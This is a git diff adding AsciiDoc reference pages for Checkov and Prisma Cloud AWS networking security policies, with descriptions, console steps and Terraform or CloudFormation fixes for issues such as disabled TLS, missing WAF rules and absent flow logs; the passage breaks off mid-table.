+. Select *Services*.
+
+. Select *VPC*.
+
+. In the left navigation pane, select *Your VPCs*.
+
+. Select a *VPC*.
+
+. In the right pane, select the *Flow Logs* tab.
+
+. If no Flow Log exists, click *Create Flow Log*.
+
+. Set *Filter* to *Reject*.
+
+. Enter a *Role* and *Destination Log Group*.
+
+. Click *Create Flow Log*.
+
+. Click *CloudWatch Logs Group*. 
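
+
+
+*CLI Command*
+
+
+Flow logs can also be created from the CLI. This is a sketch following the console steps above; the VPC ID, log group name, and IAM role ARN are placeholders to substitute with your own values:
+
+[,bash]
+----
+aws ec2 create-flow-logs \
+--resource-type VPC \
+--resource-ids <vpc_id> \
+--traffic-type REJECT \
+--log-group-name <log_group_name> \
+--deliver-logs-permission-arn <iam_role_arn>
+----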
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_flow_log + aws_vpc
+* *Arguments:* vpc_id (of aws_flow_log)
+
+
+[source,go]
+----
+resource "aws_flow_log" "example" {
+  iam_role_arn    = "arn"
+  log_destination = "log"
+  traffic_type    = "ALL"
++ vpc_id          = aws_vpc.ok_vpc.id
+}
+
+resource "aws_vpc" "ok_vpc" {
+  cidr_block = "10.0.0.0/16"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc
new file mode 100644
index 000000000..d47076ce6
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc
@@ -0,0 +1,208 @@
+== AWS Networking Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-aws-networking-37.adoc[DocDB TLS is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBTLS.py[CKV_AWS_90]
+|MEDIUM
+
+
+|xref:bc-aws-networking-63.adoc[AWS CloudFront web distribution using insecure TLS version]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py[CKV_AWS_174]
+|MEDIUM
+
+
+|xref:bc-aws-networking-64.adoc[AWS WAF does not have associated rules]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py[CKV_AWS_175]
+|LOW
+
+
+|xref:ensure-aws-acm-certificate-enables-create-before-destroy.adoc[AWS ACM certificate does not enable Create before Destroy]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py[CKV_AWS_233]
+|LOW
+
+
+|xref:ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc[AWS CloudFront web distribution with default SSL certificate]
+| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml[CKV2_AWS_42]
+|MEDIUM
+
+
+|xref:ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc[AWS Database Migration Service endpoints do not have SSL configured]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml[CKV2_AWS_49]
+|MEDIUM
+
+
+|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 20]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py[CKV_AWS_230]
+|LOW
+
+
+|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 21]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py[CKV_AWS_229]
+|LOW
+
+
+|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 22]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py[CKV_AWS_232]
+|LOW
+
+
+|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 3389]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py[CKV_AWS_231]
+|LOW
+
+
+|xref:ensure-aws-rds-security-groups-are-defined.adoc[AWS RDS security groups are not defined]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py[CKV_AWS_198]
+|LOW
+
+
+|xref:ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc[AWS route table with VPC peering overly permissive to all traffic]
+| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml[CKV2_AWS_44]
+|HIGH
+
+
+|xref:ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc[AWS Security Group allows all traffic on all ports]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py[CKV_AWS_277]
+|MEDIUM
+
+
+|xref:ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc[AWS security groups allow ingress from 0.0.0.0/0 to port 80]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py[CKV_AWS_260]
+|LOW
+
+
+|xref:ensure-no-default-vpc-is-planned-to-be-provisioned.adoc[Default VPC is planned to be provisioned]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py[CKV_AWS_148]
+|LOW
+
+
+|xref:ensure-public-api-gateway-are-protected-by-waf.adoc[Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2)]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml[CKV2_AWS_29]
+|MEDIUM
+
+
+|xref:ensure-public-facing-alb-are-protected-by-waf.adoc[AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2)]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml[CKV2_AWS_28]
+|MEDIUM
+
+
+|xref:ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc[Redshift is deployed outside of a VPC]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py[CKV_AWS_154]
+|LOW
+
+
+|xref:ensure-that-alb-drops-http-headers.adoc[ALB does not drop HTTP headers]
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py[CKV_AWS_131] +|MEDIUM + + +|xref:ensure-that-alb-redirects-http-requests-into-https-ones.adoc[ALB does not redirect HTTP requests into HTTPS ones] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml[CKV2_AWS_20] +|LOW + + +|xref:ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc[Not all EIP addresses allocated to a VPC are attached to EC2 instances] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml[CKV2_AWS_19] +|LOW + + +|xref:ensure-that-all-nacl-are-attached-to-subnets.adoc[Not all NACL are attached to subnets] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml[CKV2_AWS_1] +|LOW + + +|xref:ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc[Amazon EMR clusters' security groups are open to the world] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml[CKV2_AWS_7] +|LOW + + +|xref:ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc[Auto scaling groups associated with a load balancer do not use elastic load balancing health checks] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml[CKV2_AWS_15] +|LOW + + +|xref:ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc[AWS SageMaker notebook instance configured with direct internet access feature] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py[CKV_AWS_122] +|MEDIUM + + 
+
+|xref:ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc[AWS Elasticsearch is not configured inside a VPC]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py[CKV_AWS_137]
+|LOW
+
+
+|xref:ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc[AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py[CKV_AWS_138]
+|MEDIUM
+
+
+|xref:ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc[Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBCrossZone.py[CKV_AWS_152]
+|LOW
+
+
+|xref:ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc[Security Groups are not attached to EC2 instances or ENIs]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml[CKV2_AWS_5]
+|LOW
+
+
+|xref:ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc[VPC endpoint service is not configured for manual acceptance]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py[CKV_AWS_123]
+|LOW
+
+
+|xref:ensure-transfer-server-is-not-exposed-publicly.adoc[Transfer Server is exposed publicly] 
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py[CKV_AWS_164] +|MEDIUM + + +|xref:ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc[AWS VPC subnets should not allow automatic public IP assignment] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SubnetPublicIP.py[CKV_AWS_130] +|MEDIUM + + +|xref:ensure-waf-prevents-message-lookup-in-log4j2.adoc[WAF enables message lookup in Log4j2] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py[CKV_AWS_192] +|HIGH + + +|xref:networking-1-port-security.adoc[AWS Security Group allows all traffic on SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py[CKV_AWS_24] +|LOW + + +|xref:networking-2.adoc[AWS Security Group allows all traffic on RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py[CKV_AWS_25] +|LOW + +|xref:networking-29.adoc[AWS Elastic Load Balancer v2 (ELBv2) listener that allow connection requests over HTTP] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py[CKV_AWS_2] +|MEDIUM + + +|xref:networking-31.adoc[Not every Security Group rule has a description] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py[CKV_AWS_23] +|LOW + + +|xref:networking-32.adoc[CloudFront distribution ViewerProtocolPolicy is not set to HTTPS] +|Not Supported +| + + +|xref:networking-4.adoc[AWS Default Security Group does not restrict all traffic] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml[CKV2_AWS_12] +|LOW + + 
+|xref:s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc[S3 Bucket does not have public access blocks]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml[CKV2_AWS_6]
+|LOW
+
+
+|===
+
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc
new file mode 100644
index 000000000..86c5c17cb
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc
@@ -0,0 +1,113 @@
+== DocDB TLS is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a6ed2eba-5411-4c7e-9a81-0d9def87ecfe
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBTLS.py[CKV_AWS_90]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+TLS can be used to encrypt the connection between an application and a DocDB cluster.
+By default, encryption in transit is enabled for newly created clusters.
+It can optionally be disabled when the cluster is created, or at a later time.
+When enabled, secure connections using TLS are required to connect to the cluster.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+
+. Sign in to the AWS Management Console, and open the Amazon DocumentDB console at https://console.aws.amazon.com/docdb.
+
+. In the left navigation pane, choose *Clusters*.
+
+. In the list of clusters, select the name of your cluster.
+
+. The resulting page shows the details of the cluster that you selected.
++
+Scroll down to *Cluster details*.
++
+At the bottom of that section, locate the parameter group's name below *Cluster parameter group*.
+
+
+*CLI Command*
+
+
+
+
+[source,shell]
+----
+aws docdb describe-db-clusters \
+    --db-cluster-identifier sample-cluster \
+    --query 'DBClusters[*].[DBClusterIdentifier,DBClusterParameterGroup]'
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_docdb_cluster_parameter_group
+* *Argument:* parameter - (Optional) A list of DocumentDB parameters to apply.
+
+
+[source,go]
+----
+resource "aws_docdb_cluster_parameter_group" "example" {
+  ...
+  name = "example"
++ parameter {
++   name  = "tls"
++   value = "enabled"
++ }
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::DocDB::DBClusterParameterGroup
+* *Argument:* Parameters.tls
+
+
+[source,yaml]
+----
+Resources:
+  DocDBParameterGroupEnabled:
+    Type: AWS::DocDB::DBClusterParameterGroup
+    Properties:
+      ...
+      Parameters:
+        ...
+- tls: "disabled"
++ tls: "enabled"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc
new file mode 100644
index 000000000..c5bd6d390
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc
@@ -0,0 +1,79 @@
+== AWS CloudFront web distribution using insecure TLS version
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 45e37556-3d26-4cdb-8780-5b7fc5f60e01
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py[CKV_AWS_174]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies AWS CloudFront web distributions which are configured with insecure TLS versions for HTTPS communication between viewers and CloudFront. 
+As a best practice, use TLSv1.1_2016 or later as the minimum protocol version in your CloudFront distribution security policies.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+
+. Sign in to the AWS console.
+
+. Navigate to the CloudFront Distributions Dashboard.
+
+. Click on the reported distribution.
+
+. On the 'General' tab, click the 'Edit' button.
+
+. On the 'Edit Distribution' page, set 'Security Policy' to TLSv1.1_2016 or later as per your requirement.
+
+. Click 'Yes, Edit'.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_cloudfront_distribution
+* *Arguments:* minimum_protocol_version
+
+
+[source,go]
+----
+resource "aws_cloudfront_distribution" "pass" {
+  ...
+
+  viewer_certificate {
+    cloudfront_default_certificate = false
+    minimum_protocol_version       = "TLSv1.2_2018"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc
new file mode 100644
index 000000000..ab566722b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc
@@ -0,0 +1,115 @@
+== AWS WAF does not have associated rules
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c6f2d03c-d2fd-491d-9a29-f555709a47ae
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py[CKV_AWS_175]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+AWS WAF is a web application firewall that helps protect web applications from attacks by allowing you to configure rules that allow, block, or monitor (count) web requests based on conditions that you define.
+These conditions include IP addresses, HTTP headers, HTTP body, URI strings, SQL injection, and cross-site scripting. 
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_wafv2_web_acl
+* *Attribute:* rule - (Optional) The rule blocks used to identify the web requests that you want to allow, block, or count.
+See Rules below for details.
+
+
+[source,go]
+----
+resource "aws_wafv2_web_acl" "example" {
+  name        = "managed-rule-example"
+  description = "Example of a managed rule."
+  scope       = "REGIONAL"
+
+  default_action {
+    allow {}
+  }
+
++ rule {
+    name     = "rule-1"
+    priority = 1
+
+    override_action {
+      count {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesCommonRuleSet"
+        vendor_name = "AWS"
+
+        excluded_rule {
+          name = "SizeRestrictions_QUERYSTRING"
+        }
+
+        excluded_rule {
+          name = "NoUserAgent_HEADER"
+        }
+
+        scope_down_statement {
+          geo_match_statement {
+            country_codes = ["US", "NL"]
+          }
+        }
+      }
+    }
+
+    visibility_config {
+      cloudwatch_metrics_enabled = false
+      metric_name                = "friendly-rule-metric-name"
+      sampled_requests_enabled   = false
+    }
+  }
+
+  tags = {
+    Tag1 = "Value1"
+    Tag2 = "Value2"
+  }
+
+  visibility_config {
+    cloudwatch_metrics_enabled = false
+    metric_name                = "friendly-metric-name"
+    sampled_requests_enabled   = false
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc
new file mode 100644
index 000000000..5549d2d00
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc
@@ -0,0 +1,38 @@
+== AWS CloudFront distribution does not have a strict security headers policy attached
+
+
+=== Description
+
+Amazon CloudFront is a content delivery network (CDN) that delivers static and dynamic web content using a global network of edge locations. 
+Adding or modifying security headers on responses is a common requirement, and CloudFront introduced response headers policies to address this need and give customers more control in defining the header modifications performed by CloudFront.
+While it has been possible to manipulate response headers with CloudFront's edge serverless options, a response headers policy typically does not require custom logic unique to the use case.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_cloudfront_distribution
+* *Argument:* response_headers_policy_id (Optional) - The identifier for a response headers policy.
+
+
+[source,go]
+----
+resource "aws_cloudfront_distribution" "s3_distribution" {
+  origin {
+    domain_name = aws_s3_bucket.b.bucket_regional_domain_name
+    origin_id   = local.s3_origin_id
+
+    s3_origin_config {
+      origin_access_identity = "origin-access-identity/cloudfront/ABCDEFG1234567"
+    }
+  }
+
++ default_cache_behavior {
++   response_headers_policy_id = aws_cloudfront_response_headers_policy.pass.id
++ }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc
new file mode 100644
index 000000000..ccf586c8f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc
@@ -0,0 +1,60 @@
+== AWS ACM certificate does not enable Create before Destroy
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bbab99c0-d187-428c-b2f4-a86b7a851b5a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py[CKV_AWS_233]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+It is recommended to enable the create_before_destroy argument inside the resource lifecycle configuration block to 
avoid a possible outage when the certificate needs to be recreated during an update. + +=== Fix - Buildtime + + +*CloudFormation* + + +CloudFormation creates a new certificate first and then will delete the old one automatically. + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_acm_certificate" "example" { + domain_name = "example.com" + validation_method = "DNS" + ++ lifecycle { ++ create_before_destroy = true ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc new file mode 100644 index 000000000..55ee32beb --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc @@ -0,0 +1,72 @@ +== AWS CloudFront web distribution with default SSL certificate + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a072bd68-25cd-4245-94e1-fffee0590a50 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml[CKV2_AWS_42] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies CloudFront web distributions which have a default SSL certificate to access CloudFront content. +It is a best practice to use custom SSL Certificate to access CloudFront content. +It gives you full control over the content data. +custom SSL certificates also allow your users to access your content by using an alternate domain name. +You can use a certificate stored in AWS Certificate Manager (ACM) or you can use a certificate stored in IAM. 
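+For contrast, a distribution that falls back to the default CloudFront certificate would be flagged by this check; the following is a minimal sketch (resource name and elided origin configuration are illustrative):
+
+[source,go]
+----
+resource "aws_cloudfront_distribution" "fail_example" {
+  # ... origin and default_cache_behavior configuration ...
+
+  viewer_certificate {
+    # Relying on the default *.cloudfront.net certificate
+    cloudfront_default_certificate = true
+  }
+}
+----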
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_cloudfront_distribution" "pass_1" { + + origin { + domain_name = aws_s3_bucket.primary.bucket_regional_domain_name + origin_id = "primaryS3" + + s3_origin_config { + origin_access_identity = aws_cloudfront_origin_access_identity.default.cloudfront_access_identity_path + } + + } + + default_cache_behavior { + target_origin_id = "groupS3" + } + + + viewer_certificate { + acm_certificate_arn = "aaaaa" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc new file mode 100644 index 000000000..82ab4bb07 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc @@ -0,0 +1,69 @@ +== AWS Database Migration Service endpoint do not have SSL configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 447fc9ef-a871-4e4b-b34c-46d4aad81f51 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml[CKV2_AWS_49] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Database Migration Service (DMS) endpoints that are not configured with SSL to encrypt connections for source and target endpoints. + +It is recommended to use SSL connection for source and target endpoints; enforcing SSL connections help protect against 'man in the middle' attacks by encrypting the data stream between endpoint connections. + +NOTE: Not all databases use SSL in the same way. 
+ +An Amazon Redshift endpoint already uses an SSL connection and does not require an SSL connection set up by AWS DMS. +So there are some exclusions included in policy RQL to report only those endpoints which can be configured using DMS SSL feature. +For more details https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Security.html#CHAP_Security.SSL[see here.] + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_dms_endpoint" "pass_source_1" { + certificate_arn = "arn:aws:acm:us-east-1:123456789012:certificate/12345678-1234-1234-1234-123456789012" + database_name = "test" + endpoint_id = "test-dms-endpoint-tf" + endpoint_type = "source" + engine_name = "aurora" + extra_connection_attributes = "" + kms_key_arn = "arn:aws:kms:us-east-1:123456789012:key/12345678-1234-1234-1234-123456789012" + password = "test" + port = 3306 + server_name = "test" + ssl_mode = "require" + username = "test" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc new file mode 100644 index 000000000..0edcbbbb0 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticache-security-groups-are-defined.adoc @@ -0,0 +1,54 @@ +== AWS Elasticache security groups are not defined + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d53320d-6dcb-4592-9025-9c17a28f13f2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py[CKV_AWS_196] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By ensuring that AWS Elasticache security groups are defined, you can help protect your clusters from unauthorized access and ensure that only 
authorized traffic is allowed to reach your clusters. +This can help prevent data breaches and other security incidents, and can also help ensure that your clusters are not overwhelmed by unwanted traffic. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_elasticache_security_group" "exists" { + name = "elasticache-security-group" + security_group_names = [aws_security_group.bar.name] +} + + +resource "aws_security_group" "bar" { + name = "security-group" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc new file mode 100644 index 000000000..2fa7ae35b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc @@ -0,0 +1,69 @@ +== AWS Elasticsearch uses the default security group + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 61467e80-d0cd-44e8-ae43-c7b4877f771e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py[CKV_AWS_248] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Using the default security group for your Elasticsearch clusters can leave your clusters vulnerable to unauthorized access and other security threats. +This is because the default security group has a number of inbound and outbound rules that allow traffic from any source, which can make it easier for attackers to gain access to your clusters. +By ensuring that AWS Elasticsearch does not use the default security group, you can help protect your clusters from unauthorized access and other security threats. 
+Instead, you should create custom security groups that are tailored to your specific security needs, and use those for your Elasticsearch clusters. +This can help you more effectively control access to your clusters and protect them from potential threats. + + +*Buildtime - Fix* + + + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_elasticsearch_domain" "pass" { + domain_name = "example" + elasticsearch_version = "7.10" + + cluster_config { + instance_type = "r4.large.elasticsearch" + } + + + vpc_options { + security_group_ids = ["sg_1234545"] + } + + + tags = { + Domain = "TestDomain" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc new file mode 100644 index 000000000..463531bfc --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols.adoc @@ -0,0 +1,55 @@ +== AWS ELB Policy uses some unsecure protocols + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5c7b4ba-ca27-46a0-904e-ba0190361498 + +|Checkov Check ID +| 